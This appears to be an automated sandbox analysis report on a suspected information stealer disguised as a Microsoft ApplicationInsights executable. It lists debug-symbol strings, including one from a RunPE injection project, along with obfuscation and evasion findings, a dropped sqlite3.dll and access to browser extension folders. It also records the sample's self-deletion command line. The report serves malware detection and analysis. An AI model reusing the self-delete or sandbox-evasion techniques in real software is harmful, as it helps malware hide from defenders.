Source: Binary string: System.Configuration.ni.pdb" source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: f:\Builds\629\AppInsights\DC_Core_release_signed\obj\Release\TelemetryChannels\PersistenceChannel\Net40\Microsoft.ApplicationInsights.PersistenceChannel.pdbeChannel.PDB source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: System.pdb"" source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000B.00000003.711649726.0000000005671000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows\symbols\exe\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: System.Xml.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: System.Windows.Forms.pdb8 source: WERBFBB.tmp.dmp.11.dr
Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbt/ source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source: Binary string: dwmapi.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: mscoree.pdb source: WerFault.exe, 0000000B.00000003.711649726.0000000005671000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728618743.0000000001291000.00000004.00000020.sdmp
Source: Binary string: System.Runtime.Remoting.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: w.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: mscorlib.ni.pdbRSDS source: WERBFBB.tmp.dmp.11.dr
Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: wsspicli.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows\symbols\exe\Microsoft.ApplicationInsights.PersistenceChannel.pdbm source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source: Binary string: \??\C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.PDB source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: msasn1.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows\exe\Microsoft.ApplicationInsights.PersistenceChannel.pdbdr source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source: Binary string: f:\Builds\629\AppInsights\DC_Core_release_signed\obj\Release\TelemetryChannels\PersistenceChannel\Net40\Microsoft.ApplicationInsights.PersistenceChannel.pdbCO source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728618743.0000000001291000.00000004.00000020.sdmp
Source: Binary string: mscorlib.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: InC:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source: Binary string: comctl32v582.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: System.ni.pdbT3}l source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: sechost.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 0000000B.00000003.711688780.0000000005644000.00000004.00000040.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: System.Drawing.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: System.pdbH source: WERBFBB.tmp.dmp.11.dr
Source: Binary string: \??\C:\Windows\Microsoft.ApplicationInsights.PersistenceChannel.pdbf9z source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source: Binary string: System.Configuration.pdbD source: WERBFBB.tmp.dmp.11.dr
Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000000B.00000003.699953933.00000000031B2000.00000004.00000001.sdmp
Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WERBFBB.tmp.dmp.11.dr
Source: Binary string: Accessibility.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: System.Runtime.Remoting.pdblrP source: WERBFBB.tmp.dmp.11.dr
Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000B.00000003.711649726.0000000005671000.00000004.00000001.sdmp
Source: Binary string: System.Xml.ni.pdbRSDS source: WERBFBB.tmp.dmp.11.dr
Source: Binary string: msvcr120_clr0400.i386.pdb: source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\Microsoft.ApplicationInsights.PersistenceChannel.pdbpdbnel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source: Binary string: Microsoft.ApplicationInsights.PersistenceChannel.pdb{{ source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: ml.ni.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source: Binary string: Windows.Storage.pdb: source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: System.Core.ni.pdbRSDSD source: WERBFBB.tmp.dmp.11.dr
Source: Binary string: comctl32v582.pdb: source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: Accessibility.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: C:\Windows\Resources\new\Repo\Debug\private\RUNPE\JabrezRPE\JabrezRPE\obj\Debug\RunPE_MemoryProtection.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.736476721.0000000003F32000.00000004.00000001.sdmp
Source: Binary string: rawing.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: mscorlib.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: mscoreei.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000B.00000003.711751225.0000000005640000.00000004.00000040.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: shell32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: Microsoft.ApplicationInsights.PersistenceChannel.PDB source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb\ source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: userenv.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: RunPE_MemoryProtection.pdbFyg source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: diasymreader.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: ore.pdb, source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: mscorlib.ni.pdb% source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: uilds\629\AppInsights\DC_Core_release_signed\obj\Release\TelemetryChannels\PersistenceChannel\Net40\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728618743.0000000001291000.00000004.00000020.sdmp
Source: Binary string: System.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000000B.00000003.699575783.00000000031A6000.00000004.00000001.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: Microsoft.ApplicationInsights.PersistenceChannel.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: C:\Windows\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000B.00000003.711751225.0000000005640000.00000004.00000040.sdmp
Source: Binary string: System.Core.pdbR source: WERBFBB.tmp.dmp.11.dr
Source: Binary string: WLDP.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: System.ni.pdbRSDS source: WERBFBB.tmp.dmp.11.dr
Source: Binary string: \??\C:\Windows\exe\Microsoft.ApplicationInsights.PersistenceChannel.pdboq source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source: Binary string: clrjit.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: symbols\exe\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: System.Runtime.Remoting.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: version.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: RunPE_MemoryProtection.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: wintrust.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: System.Xml.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: System.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: ore.ni.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: ore.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: Microsoft.ApplicationInsights.PersistenceChannel.pdbd source: WERBFBB.tmp.dmp.11.dr
Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000B.00000003.711751225.0000000005640000.00000004.00000040.sdmp
Source: Binary string: psapi.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: rawing.pdb" source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000B.00000003.699980162.00000000031B8000.00000004.00000001.sdmp
Source: Binary string: Amsi.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: System.Drawing.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: combase.pdbk source: WerFault.exe, 0000000B.00000003.711688780.0000000005644000.00000004.00000040.sdmp
Source: Binary string: System.Core.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbrt- source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: Microsoft.VisualBasic.pdb" source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: untime.Remoting.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: System.ni.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: cryptbase.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: crypt32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00412560 push eax; ret 2_2_0041258E
PE file contains sections with non-standard names
Source: sqlite3[1].dll.2.dr Static PE information: section name: /4
Source: sqlite3[1].dll.2.dr Static PE information: section name: /19
Source: sqlite3[1].dll.2.dr Static PE information: section name: /35
Source: sqlite3[1].dll.2.dr Static PE information: section name: /51
Source: sqlite3[1].dll.2.dr Static PE information: section name: /63
Source: sqlite3[1].dll.2.dr Static PE information: section name: /77
Source: sqlite3[1].dll.2.dr Static PE information: section name: /89
Source: sqlite3[1].dll.2.dr Static PE information: section name: /102
Source: sqlite3[1].dll.2.dr Static PE information: section name: /113
Source: sqlite3[1].dll.2.dr Static PE information: section name: /124
Source: sqlite3.dll.2.dr Static PE information: section name: /4
Source: sqlite3.dll.2.dr Static PE information: section name: /19
Source: sqlite3.dll.2.dr Static PE information: section name: /35
Source: sqlite3.dll.2.dr Static PE information: section name: /51
Source: sqlite3.dll.2.dr Static PE information: section name: /63
Source: sqlite3.dll.2.dr Static PE information: section name: /77
Source: sqlite3.dll.2.dr Static PE information: section name: /89
Source: sqlite3.dll.2.dr Static PE information: section name: /102
Source: sqlite3.dll.2.dr Static PE information: section name: /113
Source: sqlite3.dll.2.dr Static PE information: section name: /124
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00405E20 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 2_2_00405E20

Persistence and Installation Behavior:

Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File created: C:\ProgramData\sqlite3.dll
Drops PE files
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File created: C:\ProgramData\sqlite3.dll
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\sqlite3[1].dll

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process created: 'C:\Windows\System32\cmd.exe' /c timeout /t 5 & del /f /q 'C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe' & exit
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_0040B0B0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 2_2_0040B0B0
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality to detect sleep reduction / modifications
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00405740 2_2_00405740
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\timeout.exe TID: 5652 Thread sleep count: 42 > 30
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\sqlite3[1].dll
Is looking for software installed on the system
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Registry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
May check if the current machine is a sandbox (GetTickCount - Sleep)
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00405740 2_2_00405740
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00401000 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 2_2_00401000
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00408820 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose, 2_2_00408820
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00407560 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_00407560
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_004011F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 2_2_004011F0
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00408650 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_00408650
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00408410 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 2_2_00408410
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00404DD0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,FindNextFileA,FindClose, 2_2_00404DD0
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
